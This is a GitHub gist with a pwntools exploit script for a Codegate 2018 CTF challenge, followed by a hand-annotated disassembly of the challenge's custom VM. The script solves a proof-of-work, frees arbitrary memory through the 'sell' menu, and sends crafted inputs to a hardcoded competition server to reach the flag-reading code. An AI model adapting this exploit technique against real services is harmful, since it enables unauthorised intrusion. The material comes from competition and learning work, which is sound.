Skip to content

Instantly share code, notes, and snippets.

@yough3rt

yough3rt/z.py

Created April 10, 2018 07:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save yough3rt/94717b0b08abe200b1f80a60e58347a6 to your computer and use it in GitHub Desktop.
Save yough3rt/94717b0b08abe200b1f80a60e58347a6 to your computer and use it in GitHub Desktop.
Download ZIP
EXP for Codegate 2018 Final _GameBox 4 tiny
Raw
z.py
#!/usr/bin/env python
# encoding: utf-8
from pwn import *
r = remote("58.229.240.150", 8888)
context.log_level = 'debug'
import random
from hashlib import sha1
r.recvuntil("prefix : ")
prefix = r.recv(6)
print prefix
x = 0
while 1:
x += 1
# x=chr(random.randint(0,0xff))+chr(random.randint(0,0xff))+chr(random.randint(0,0xff))
# y=chr(random.randint(0,0xff))+chr(random.randint(0,0xff))+chr(random.randint(0,0xff))
# z=chr(random.randint(0,0xff))+chr(random.randint(0,0xff))+chr(random.randint(0,0xff))
answer = prefix + str(x)
if not sha1(answer).hexdigest().endswith('000000'):
continue
r.sendline(answer)
break
# r = process("./vm_tiny.py")
def buy(avatar, data = 1):
r.sendlineafter(">", "2")
if data == 0:
r.sendlineafter(">", "n")
return
r.sendlineafter(">", "y")
r.sendline(avatar)
r.recvuntil("new dog")
def sell(index):
r.sendlineafter(">", "3")
r.sendlineafter("which dog do you want to sell?\n>", index)
def p(i):
ret = chr(i & 0b000000000000001111111)
ret += chr((i & 0b111111100000000000000) >> 14)
ret += chr((i & 0b000000011111110000000) >> 7)
return ret
# buy("aaa")
# for i in range(0x100000, 0x100000 + 10 * 0x1000, 0x1000):
sell(p(0x100000))
sell(p(0x110000))
sell(p(0x120000))
sell(p(0x130000))
sell(p(0x140000))
sell(p(0x150000))
for i in range(256):
buy("@".ljust(3600, "z"), 0)
m = "@" + "*" * 300
m = m.ljust(3600, "z")
buy(m, 1)
for i in range(5):
for j in range(60):
r.sendlineafter(">", "d")
r.sendlineafter(">", "s")
r.sendlineafter(">", "s")
r.sendlineafter(">", "1")
# r.recvuntil(">")
r.interactive()
Raw
zzz
0: sp -= 3
5: r2 = 6
10: r1 = sp
12: r0 = 4
17: syscall
19: r10 = tri*(r1)
21: call 30
26: r0 ^= r0
28: syscall
main():
30: push bp
32: bp = sp
34: sp -= 6
39: r0 = 1762
44: call puts
49: call 259 // init struct && map
54: call 431 // if hp > 0
59: cmp r0 0
64: je(==) 253 // ret
69: r0 = 2729
74: call puts
79: r5 = bp
81: r5 -= 6
86: tri*(r5) = zero
88: r1 = 3
93: r0 = r5
95: call read_syscall // read 3 to ebp-6
100: r6 ^= r6
102: r5 = bp
104: r5 -= 6
109: low(r6) = low*(r5)
111: cmp low(r6) low(49)
116: jne(!=) 131
121: call 486 // show map
126: jmp 248
131: cmp low(r6) low(50)
136: jne(!=) 151
141: call 604
146: jmp 248 // raise a dog
151: cmp low(r6) low(51)
156: jne(!=) 171
161: call 772 // sell a dog
166: jmp 248
171: cmp low(r6) low(52)
176: jne(!=) 196
181: r0 = 2295
186: call puts
191: jmp 248
196: cmp low(r6) low(119)
201: je(==) 241
206: cmp low(r6) low(97)
211: je(==) 241
216: cmp low(r6) low(115)
221: je(==) 241
226: cmp low(r6) low(100)
231: je(==) 241
236: jmp 248
241: r0 = r6
243: call 899
248: jmp 54
253: sp = bp
255: pop bp
257: pop pc
init_struct && map():
259: push bp
261: bp = sp
263: sp -= 6
268: r5 = r10
270: tri*(r5) = zero
272: r5 = r10
274: r5 += 3
279: r2 = 256
284: r2 *= 3
289: r1 = 0
294: r0 = r5
296: call memset
301: r5 = r10
303: r5 += 774
308: r6 = 6
313: tri*(r5) = r6
315: r5 = r10
317: r5 += 777
322: r6 = 120
327: tri*(r5) = r6
329: r5 = r10
331: r5 += 780
336: r6 = 97
341: tri*(r5) = r6
343: r5 = r10
345: r5 += 783
350: tri*(r5) = zero
352: r5 = r10
354: r5 += 786
359: tri*(r5) = zero
361: r2 = 6
366: r5 = bp
368: r5 -= 6
373: r1 = r5
375: r0 = 4
380: syscall
382: r7 = tri*(r1)
384: r5 = r10
386: r5 += 771
391: tri*(r5) = r7
393: r5 = 3711
398: r1 = r5
400: r0 = 1
405: syscall
407: r3 = 3600
412: r2 = r7
414: r1 = r0
416: r0 = 3
421: syscall
423: r0 = r2
425: sp = bp
427: pop bp
429: pop pc
if hp > 0:
431: push bp
433: bp = sp
435: sp -= 6
440: call get_hp
445: cmp r0 0
450: jb(>) 475
455: r0 = 3174
460: call puts
465: r0 = 0
470: jmp 480
475: r0 = 1
480: sp = bp
482: pop bp
484: pop pc
print_map():
486: push bp
488: bp = sp
490: sp -= 3
495: r0 = 2501
500: call puts
505: r0 = 2924
510: call puts
515: call get_map
520: r7 = r0
522: r6 ^= r6
524: cmp r6 60
529: je(==) 588
534: r1 = 1
539: r0 = 3040
544: call write_syscall
549: r1 = 60
554: r0 = r7
556: call write_syscall
561: r1 = 2
566: r0 = 3042
571: call write_syscall
576: r7 += 60
581: r6++
583: jmp 524
588: r0 = 2924
593: call puts
598: sp = bp
600: pop bp
602: pop pc
raise_a_god():
604: push bp
606: bp = sp
608: sp -= 6
613: r2 = 6
618: r5 = bp
620: r5 -= 3
625: r1 = r5
627: r0 = 4
632: syscall
634: cmp r0 0
639: je(==) 756
644: r5 = r10
646: r6 = tri*(r5)
648: r6++
650: tri*(r5) = r6
652: r6 *= 3
657: r6 += r10
659: r5 = bp
661: r5 -= 3
666: r5 = tri*(r5)
668: tri*(r6) = r5
670: r0 = 3047
675: call puts
680: r1 = 3
685: r5 = bp
687: r5 -= 6
692: r0 = r5
694: call read_syscall
699: r5 = bp
701: r5 -= 6
706: r6 ^= r6
708: low(r6) = low*(r5)
710: cmp low(r6) low(121)
715: jne(!=) 741
720: r1 = 4096
725: r5 = bp
727: r5 -= 3
732: r6 = tri*(r5)
734: r0 = r6
736: call read_syscall
741: r0 = 3096
746: call puts
751: jmp 766
756: r0 = 3141
761: call puts
766: sp = bp
768: pop bp
770: pop pc
sell_a_dog():
772: push bp
774: bp = sp
776: sp -= 6
781: r5 = r10
783: r5 += 774
788: r6 = tri*(r5)
790: cmp r6 0
795: je(==) 883
800: r6--
802: tri*(r5) = r6
804: r0 = 2988
809: call puts
814: r1 = 4 # TODO
819: r5 = bp
821: r5 -= 6
826: r0 = r5
828: call read_syscall
833: r5 = bp
835: r5 -= 6
840: r6 = tri*(r5)
842: cmp r6 1048576
847: js(<) 883
852: r5 = bp
854: r5 -= 6
859: r1 = tri*(r5)
861: r0 = 6
866: syscall
868: r0 = 3021
873: call puts
878: jmp 893
883: r0 = 3116
888: call puts
893: sp = bp
895: pop bp
897: pop pc
899: push bp
901: bp = sp
903: sp -= 12
908: r5 = bp
910: r5 -= 3
915: low*(r5) = r0
917: call get_map
922: r5 = bp
924: r5 -= 9
929: tri*(r5) = r0
931: r5 = r10
933: r5 += 783
938: r8 = tri*(r5)
940: r5 = r10
942: r5 += 786
947: r9 = tri*(r5)
949: r5 = r0
951: r6 = r9
953: r6 *= 60
958: r5 += r6
960: r5 += r8
962: r6 ^= r6
964: low(r6) = low*(r5)
966: cmp low(r6) low(64)
971: jne(!=) 983
976: r6 = 32
981: low*(r5) = r6
983: r6 ^= r6
985: r5 = bp
987: r5 -= 3
992: low(r6) = low*(r5)
994: cmp low(r6) low(119)
999: jne(!=) 1016
1004: r9--
1006: r9 = 60
1011: jmp 1067
1016: cmp low(r6) low(97)
1021: jne(!=) 1038
1026: r8--
1028: r8 = 60
1033: jmp 1067
1038: cmp low(r6) low(115)
1043: jne(!=) 1060
1048: r9++
1050: r9 = 60
1055: jmp 1067
1060: r8++
1062: r8 = 60
1067: r5 = r10
1069: r5 += 783
1074: tri*(r5) = r8
1076: r5 = r10
1078: r5 += 786
1083: tri*(r5) = r9
1085: r5 = bp
1087: r5 -= 9
1092: r5 = tri*(r5)
1094: r6 = r9
1096: r6 *= 60
1101: r5 += r6
1103: r5 += r8
1105: r6 = bp
1107: r6 -= 12
1112: tri*(r6) = r5
1114: r6 ^= r6
1116: low(r6) = low*(r5)
1118: r7 = 64
1123: low*(r5) = r7
1125: cmp low(r6) low(32)
1130: je(==) 1439
1135: cmp low(r6) low(42)
1140: je(==) 1285
1145: cmp low(r6) low(122)
1150: je(==) 1332
1155: cmp low(r6) low(97)
1160: js(<) 1439
1165: cmp low(r6) low(122)
1170: jb(>) 1439
1175: r0 = 2823
1180: call puts
1185: r1 = 3
1190: r5 = bp
1192: r5 -= 6
1197: r0 = r5
1199: call read_syscall
1204: r5 = r10
1206: r5 += 777
1211: r7 = tri*(r5)
1213: cmp r7 30
1218: js(<) 1235
1223: r7 -= 30
1228: tri*(r5) = r7
1230: jmp 1237
1235: tri*(r5) = zero
1237: r5 = r10
1239: r5 += 780
1244: r7 = tri*(r5)
1246: cmp r6 r7
1248: jb(>) 1269
1253: r5 = bp
1255: r5 -= 12
1260: r8 = tri*(r5)
1262: r6 = 42
1267: low*(r8) = r6
1269: r5 = bp
1271: r5 -= 12
1276: r8 = tri*(r5)
1278: low*(r8) = r6
1280: jmp 1439
* (power up):
1285: r5 = r10
1287: r5 += 777
1292: r7 = tri*(r5)
1294: r7 += 40
1299: tri*(r5) = r7
1301: r5 = r10
1303: r5 += 780
1308: r7 = tri*(r5)
1310: r7 += 5
1315: tri*(r5) = r7
1317: r0 = 2913
1322: call puts
1327: jmp 1439
boss:
1332: r0 = 2863
1337: call puts
1342: r1 = 3
1347: r5 = bp
1349: r5 -= 6
1354: r0 = r5
1356: call read_syscall
1361: r5 = r10
1363: r5 += 777
1368: r7 = tri*(r5)
1370: cmp r7 2000
1375: js(<) 1392
1380: r7 -= 2000
1385: tri*(r5) = r7
1387: jmp 1394
1392: tri*(r5) = zero
1394: r5 = r10
1396: r5 += 780
1401: r7 = tri*(r5)
1403: cmp r7 700
1408: js(<) 1423
1413: call 1471
1418: jmp 1439
1423: r5 = bp
1425: r5 -= 12
1430: r8 = tri*(r5)
1432: low*(r8) = r6
1434: jmp 1439
1439: sp = bp
1441: pop bp
1443: pop pc
get_map
1445: r5 = r10
1447: r5 += 771
1452: r6 = tri*(r5)
1454: r0 = r6
1456: pop pc
get_hp:
1458: r5 = r10
1460: r5 += 777
1465: r6 = tri*(r5)
1467: r0 = r6
1469: pop pc
1471: push bp
1473: bp = sp
1475: sp -= 60
1480: r2 = 60
1485: r1 = 0
1490: r5 = bp
1492: r5 -= 60
1497: r0 = r5
1499: call memset
1504: r1 = 3706
1509: r0 = 1
1514: syscall
1516: r3 = 60
1521: r5 = bp
1523: r5 -= 60
1528: r2 = r5
1530: r1 = r0
1532: r0 = 3
1537: syscall
1539: r5 = bp
1541: r5 -= 60
1546: r0 = r5
1548: call puts
1553: r0 ^= r0
1555: syscall
1557: sp = bp
1559: pop bp
1561: pop pc
memset:
1563: push r0
1565: push r1
1567: push r2
1569: cmp r2 0
1574: je(==) 1590
1579: low*(r0) = r1
1581: r0++
1583: r2--
1585: jmp 1569
1590: pop r2
1592: pop r1
1594: pop r0
1596: pop pc
memcpy
1598: push r0
1600: push r1
1602: push r2
1604: push r3
1606: cmp r2 0
1611: je(==) 1631
1616: low(r3) = low*(r1)
1618: low*(r0) = r3
1620: r0++
1622: r1++
1624: r2--
1626: jmp 1606
1631: pop r3
1633: pop r2
1635: pop r1
1637: pop r0
1639: pop pc
read_syscall:
1641: push r1
1643: push r2
1645: push r3
1647: r3 = r1
1649: r2 = r0
1651: r1 = 0
1656: r0 = 3
1661: syscall
1663: pop r3
1665: pop r2
1667: pop r1
1669: pop pc
write_syscall:
1671: push r1
1673: push r2
1675: push r3
1677: r3 = r1
1679: r2 = r0
1681: r1 = 1
1686: r0 = 2
1691: syscall
1693: pop r3
1695: pop r2
1697: pop r1
1699: pop pc
puts():
1701: push r0
1703: push r1
1705: r1 = r0
1707: call strlen
1712: exchange r1 r0
1714: call write_syscall
1719: pop r1
1721: pop r0
1723: pop pc
strlen():
1725: push r1
1727: push r2
1729: r1 ^= r1
1731: r2 ^= r2
1733: low(r2) = low*(r0)
1735: cmp low(r2) low(0)
1740: je(==) 1754
1745: r0++
1747: r1++
1749: jmp 1733
1754: r0 = r1
1756: pop r2
1758: pop r1
1760: pop pc
0: 0 (count of dog)
3-771: 0
771 : addr (map)
774 : 6
777 : 120 (hp)
780 : 97
783 : 0
786 : 0
sys_s0: exit(0)
sys_s1: open(filename)
sys_s2: write(fd, buf, size)
sys_s3: read(fd, buf, size)
sys_s4: malloc(r1, perm)
sys_s5: rand()
sys_s6: free(r1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment